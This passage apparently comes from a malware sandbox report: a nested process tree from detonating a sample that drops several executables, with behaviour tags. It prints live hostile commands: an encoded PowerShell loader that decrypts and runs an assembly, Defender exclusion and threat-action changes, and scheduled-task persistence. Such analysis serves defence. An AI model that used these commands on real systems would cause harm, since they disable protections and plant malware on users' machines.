                                                                    • C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
                                                                      "C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet -burn.unelevated BurnPipe.{E423BE90-066D-49B3-BE64-EAF54083DD92} {5C0B486A-557D-4D11-990C-0449E319177D} 2156
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      PID:3088
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c install.bat
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5168
                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                      regsvr32 /s "DroidCamFilter32.ax"
                                                                      6⤵
                                                                      • Loads dropped DLL
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Modifies registry class
                                                                      PID:4112
                                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                                      regsvr32 /s "DroidCamFilter64.ax"
                                                                      6⤵
                                                                      • Loads dropped DLL
                                                                      PID:1100
                                                                      • C:\Windows\system32\regsvr32.exe
                                                                        /s "DroidCamFilter64.ax"
                                                                        7⤵
                                                                        • Loads dropped DLL
                                                                        • Modifies registry class
                                                                        PID:5268
                                                                  • C:\Program Files (x86)\DroidCam\lib\insdrv.exe
                                                                    "C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +v
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in System32 directory
                                                                    • Drops file in Windows directory
                                                                    • Checks SCSI registry key(s)
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4172
                                                                  • C:\Program Files (x86)\DroidCam\lib\insdrv.exe
                                                                    "C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +a
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in System32 directory
                                                                    • Drops file in Windows directory
                                                                    • Checks SCSI registry key(s)
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:6128
                                                                • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\bloatware\3.exe
                                                                  3.exe
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Modifies registry class
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:5812
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5812 -s 1916
                                                                    5⤵
                                                                    • Program crash
                                                                    PID:6092
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                  4⤵
                                                                  • Blocklisted process makes network request
                                                                  PID:5156
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /K SilentSetup.cmd
                                                                  4⤵
                                                                    PID:2060
                                                                    • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe
                                                                      WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:5160
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-NG3VO.tmp\WinaeroTweaker-1.40.0.0-setup.tmp
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-NG3VO.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$30366,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Drops file in Program Files directory
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:5664
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f
                                                                          7⤵
                                                                            PID:5496
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im winaerotweaker.exe /f
                                                                              8⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:5292
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f
                                                                            7⤵
                                                                              PID:3132
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /im winaerotweakerhelper.exe /f
                                                                                8⤵
                                                                                • Kills process with taskkill
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:5848
                                                                    • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\regmess.exe
                                                                      regmess.exe
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:6108
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_2c6b7bf8-cb70-4590-b56d-88558aa47c83\regmess.bat" "
                                                                        4⤵
                                                                          PID:5472
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg import Setup.reg /reg:32
                                                                            5⤵
                                                                              PID:5448
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg import Console.reg /reg:32
                                                                              5⤵
                                                                                PID:3244
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg import Desktop.reg /reg:32
                                                                                5⤵
                                                                                • Sets desktop wallpaper using registry
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:5904
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg import International.reg /reg:32
                                                                                5⤵
                                                                                  PID:1536
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg import Fonts.reg /reg:32
                                                                                  5⤵
                                                                                  • Modifies Internet Explorer settings
                                                                                  PID:5432
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg import Cursors.reg /reg:32
                                                                                  5⤵
                                                                                    PID:5452
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                timeout /t 10
                                                                                3⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:5364
                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\scary.exe
                                                                                scary.exe
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Drops file in Program Files directory
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:5748
                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                  "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                  4⤵
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:256
                                                                                • C:\Program Files\SubDir\Romilyaa.exe
                                                                                  "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  PID:4696
                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                    "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                    5⤵
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:6116
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HGx9Tmkty1i8.bat" "
                                                                                    5⤵
                                                                                      PID:5528
                                                                                      • C:\Windows\system32\chcp.com
                                                                                        chcp 65001
                                                                                        6⤵
                                                                                          PID:800
                                                                                        • C:\Windows\system32\PING.EXE
                                                                                          ping -n 10 localhost
                                                                                          6⤵
                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                          • Runs ping.exe
                                                                                          PID:2884
                                                                                        • C:\Program Files\SubDir\Romilyaa.exe
                                                                                          "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5604
                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                            "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                            7⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:5488
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s76JUVQhuO7m.bat" "
                                                                                            7⤵
                                                                                              PID:5216
                                                                                              • C:\Windows\system32\chcp.com
                                                                                                chcp 65001
                                                                                                8⤵
                                                                                                  PID:5268
                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                  ping -n 10 localhost
                                                                                                  8⤵
                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                  • Runs ping.exe
                                                                                                  PID:276
                                                                                                • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                  "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                  PID:6800
                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                    "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                    9⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:6424
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\001tXUvfxye6.bat" "
                                                                                                    9⤵
                                                                                                      PID:5896
                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                        chcp 65001
                                                                                                        10⤵
                                                                                                          PID:6304
                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                          ping -n 10 localhost
                                                                                                          10⤵
                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                          • Runs ping.exe
                                                                                                          PID:6204
                                                                                                        • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                          "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                          10⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                          PID:4756
                                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                            "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                            11⤵
                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                            PID:6416
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NbVa5oHP2lMM.bat" "
                                                                                                            11⤵
                                                                                                              PID:5352
                                                                                                              • C:\Windows\system32\chcp.com
                                                                                                                chcp 65001
                                                                                                                12⤵
                                                                                                                  PID:2320
                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                  ping -n 10 localhost
                                                                                                                  12⤵
                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:2932
                                                                                                                • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                                  "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                                  12⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                  PID:4960
                                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                    "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                    13⤵
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:6180
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Q4WqICosQjC6.bat" "
                                                                                                                    13⤵
                                                                                                                      PID:6500
                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                        chcp 65001
                                                                                                                        14⤵
                                                                                                                          PID:6172
                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                          ping -n 10 localhost
                                                                                                                          14⤵
                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                          • Runs ping.exe
                                                                                                                          PID:236
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\the.exe
                                                                                                    the.exe
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3836
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                                                                                      4⤵
                                                                                                      • UAC bypass
                                                                                                      • Windows security bypass
                                                                                                      • Manipulates Digital Signatures
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:3196
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\the.exe" -Force
                                                                                                        5⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:7084
                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                                                        5⤵
                                                                                                        • Drops startup file
                                                                                                        PID:7108
                                                                                                        • C:\Users\Admin\Pictures\0HJDHhn37to9hl9HAWKLNgzL.exe
                                                                                                          "C:\Users\Admin\Pictures\0HJDHhn37to9hl9HAWKLNgzL.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:3612
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSF076.tmp\Install.exe
                                                                                                            .\Install.exe
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5608
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSF364.tmp\Install.exe
                                                                                                              .\Install.exe /aaPpdidnSmKE "385104" /S
                                                                                                              8⤵
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Executes dropped EXE
                                                                                                              • Enumerates system info in registry
                                                                                                              PID:5140
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                9⤵
                                                                                                                  PID:5772
                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                    10⤵
                                                                                                                    • Indirect Command Execution
                                                                                                                    PID:1448
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                      11⤵
                                                                                                                        PID:3492
                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                          12⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:676
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                      10⤵
                                                                                                                      • Indirect Command Execution
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:7032
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                        11⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:6280
                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                          12⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:5468
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                      10⤵
                                                                                                                      • Indirect Command Execution
                                                                                                                      PID:6932
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                        11⤵
                                                                                                                          PID:3276
                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                            12⤵
                                                                                                                              PID:5552
                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                          10⤵
                                                                                                                          • Indirect Command Execution
                                                                                                                          PID:2860
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                            11⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:5692
                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                              12⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:1636
                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                          10⤵
                                                                                                                          • Indirect Command Execution
                                                                                                                          PID:6240
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                            11⤵
                                                                                                                              PID:2216
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                12⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:6380
                                                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                  13⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:3164
                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                          9⤵
                                                                                                                          • Indirect Command Execution
                                                                                                                          PID:4928
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                            10⤵
                                                                                                                              PID:6644
